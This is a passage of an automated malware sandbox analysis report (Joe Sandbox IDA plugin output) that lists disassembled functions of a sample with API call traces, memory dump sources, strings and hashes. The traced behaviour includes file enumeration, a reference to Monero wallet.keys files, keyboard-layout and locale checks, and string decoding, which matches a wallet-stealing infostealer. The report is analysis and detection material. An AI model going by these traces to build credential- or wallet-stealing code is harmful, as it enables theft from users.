                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 7b038b0945cc8cca1e413fc3c985037c74b5b871f90662a9102ee44fccc3f270
                                  • Instruction ID: e92da5bd34b48bae4f28631ec46a42345857fc878e45837548ce902aaaeeb4b1
                                  • Opcode Fuzzy Hash: 7b038b0945cc8cca1e413fc3c985037c74b5b871f90662a9102ee44fccc3f270
                                  • Instruction Fuzzy Hash: D2120271970118ABEB1DFB60CC96EEE7378AF54300F414599B50A66091EF306FA9CF91
                                  Function 0023DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00250C2E), ref: 0023DE5E
                                  • StrCmpCA.SHLWAPI(?,002514C8), ref: 0023DEAE
                                  • StrCmpCA.SHLWAPI(?,002514CC), ref: 0023DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0023E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: f09a785561022d607fbe3f9292e1df4394ec35f013b974c561733791f65daacf
                                  • Instruction ID: ef81cf1edb57ff29d72200f0c3d6fbebfc55ecf0b34ae10e896b34d8cce88281
                                  • Opcode Fuzzy Hash: f09a785561022d607fbe3f9292e1df4394ec35f013b974c561733791f65daacf
                                  • Instruction Fuzzy Hash: 7AF17F718741189AEB19EB60DC96EEE7338FF54304F8141D9A41A62091EF306FA9CF56
                                  Function 0023DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002514B0,00250C2A), ref: 0023DAEB
                                  • StrCmpCA.SHLWAPI(?,002514B4), ref: 0023DB33
                                  • StrCmpCA.SHLWAPI(?,002514B8), ref: 0023DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0023DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: cb95afac1e8c88ba8db483c141492ba358ad47472b44aa46f6948710cefd8cd6
                                  • Instruction ID: 0e2547c9b32c49753dde8e87ff135f1998c6b732e69ecfafdeee271cfd3852d7
                                  • Opcode Fuzzy Hash: cb95afac1e8c88ba8db483c141492ba358ad47472b44aa46f6948710cefd8cd6
                                  • Instruction Fuzzy Hash: 099126B296010497DB18FF70EC569ED737DAB84304F418668F90A96141EE349B79CF92
                                  Function 00611D7D Relevance: 13.0, Strings: 9, Instructions: 1756COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: L}$ tnx$"_$B*zy$UG/<$_Mw$a)i?$o2=$Kx=
                                  • API String ID: 0-2094392686
                                  • Opcode ID: 3ff2cc8064e7fafbe026fd080c5148507d84ff74b4071451c056ab2d9c7c10e8
                                  • Instruction ID: 2bf04d009a71a6928f1cedcbecc6d81cbd70d30fb08c7891fea762e0c5261eea
                                  • Opcode Fuzzy Hash: 3ff2cc8064e7fafbe026fd080c5148507d84ff74b4071451c056ab2d9c7c10e8
                                  • Instruction Fuzzy Hash: 0EB27CF360C2049FE3046E2DEC8567BFBD9EB94360F2A463EEAC5C3744E97558018696
                                  Function 00247B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,002505AF), ref: 00247BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00247BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00247C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00247C62
                                  • LocalFree.KERNEL32(00000000), ref: 00247D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 4a3b98d233d415e316c3407763c0271e6ad616daade2cbe465e1c8e9b0ff7f46
                                  • Instruction ID: 4fbb9e628f1c9a21f744f36612b591fd047ab7d230ea4b0dc514e3306611e493
                                  • Opcode Fuzzy Hash: 4a3b98d233d415e316c3407763c0271e6ad616daade2cbe465e1c8e9b0ff7f46
                                  • Instruction Fuzzy Hash: 17418E71960218ABDB28DF94DC89BEEB378FF44700F2041D9E50A62280DB742F95CFA1
                                  Function 00609848 Relevance: 10.4, Strings: 7, Instructions: 1671COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <Z/K$P~5T$Z*;$dxk$glv$q5_$qU=
                                  • API String ID: 0-3955391047
                                  • Opcode ID: 561d0cbb2f05856dae3602b9db34ea7dc6f71146f12a757824037df35b62093c
                                  • Instruction ID: b734cfc5c376272e53493e1e851961752f4d2ba7a4d1ae6f6f3707356aebc320
                                  • Opcode Fuzzy Hash: 561d0cbb2f05856dae3602b9db34ea7dc6f71146f12a757824037df35b62093c
                                  • Instruction Fuzzy Hash: 04B23BF3A0C6109FE7046E2DEC8567ABBE9EF94360F1A493DE6C4C7744EA3558018792
                                  Function 0060E781 Relevance: 10.4, Strings: 7, Instructions: 1613COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: +fm$4O?$_vW[$_vW[$au{$w.=m$%~;
                                  • API String ID: 0-184584897
                                  • Opcode ID: ec41f3497ecf260e0f1d7263a550a71c4ae2c8d33b23028a7125fd04fb8c4fb1
                                  • Instruction ID: 519ea0c97e39ba9ca7262333c116cb4a72d5e8c36dc67a3e225a08c7a5f0785f
                                  • Opcode Fuzzy Hash: ec41f3497ecf260e0f1d7263a550a71c4ae2c8d33b23028a7125fd04fb8c4fb1
                                  • Instruction Fuzzy Hash: 14B2F7F3A086109FE304AE2DEC8567AB7E5EFD4720F1A893DE6C4C3744E63558418697
                                  Function 0023E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00250D73), ref: 0023E4A2
                                  • StrCmpCA.SHLWAPI(?,002514F8), ref: 0023E4F2
                                  • StrCmpCA.SHLWAPI(?,002514FC), ref: 0023E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: dc8d6e0587cc9c7be05790906e5cf64d02563c5b0085c1430c38390705374785
                                  • Instruction ID: 1ca0eafdfd4e6546ebff815c63d22d50c403cc144253bfa1b7829daaac7324af
                                  • Opcode Fuzzy Hash: dc8d6e0587cc9c7be05790906e5cf64d02563c5b0085c1430c38390705374785
                                  • Instruction Fuzzy Hash: 51122172970118AAEB1CFB70DC96EED7378AF54300F4145A9B50A96091EF306F69CF92
                                  Function 00613965 Relevance: 9.1, Strings: 6, Instructions: 1614COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 'O9$E0w?$QZb;$cw^_$h8$qj{
                                  • API String ID: 0-494948850
                                  • Opcode ID: 8d61a38840ba9327f5896ec9e767270caedd6b2a81639fbaed8803fded6b0bb1
                                  • Instruction ID: f5b8fdc58658fce63988179a8b2e719d306bb9ca0ab559271736452968da466e
                                  • Opcode Fuzzy Hash: 8d61a38840ba9327f5896ec9e767270caedd6b2a81639fbaed8803fded6b0bb1
                                  • Instruction Fuzzy Hash: 3AB2F7F36083049FE304AE2DEC8567ABBE9EF94720F16893DE6C4C3744E63598458697
                                  Function 00239AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00234EEE,00000000,?), ref: 00239B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00234EEE,00000000,?), ref: 00239B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: N#
                                  • API String ID: 4291131564-682395493
                                  • Opcode ID: 107492b0e3a857bee49987c2033fdda62cd9d02b0d184f3b523dc2c0af744503
                                  • Instruction ID: a4d1a3fdece807765431ebd31c45690ed29f80c67160127c009e4327af87a1de
                                  • Opcode Fuzzy Hash: 107492b0e3a857bee49987c2033fdda62cd9d02b0d184f3b523dc2c0af744503
                                  • Instruction Fuzzy Hash: AB11D4B4240208EFEB00CF64CC95FAAB7B5FB8A704F208058F9199B390C7B1A951CB54
                                  Function 00607BEF Relevance: 7.9, Strings: 5, Instructions: 1694COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: K\l$;g=s$HpN$om{${K^
                                  • API String ID: 0-2389152663
                                  • Opcode ID: f41b077491c12518c461b1b751b4245f27b03c69dda6a53cf2b7b1f91b508106
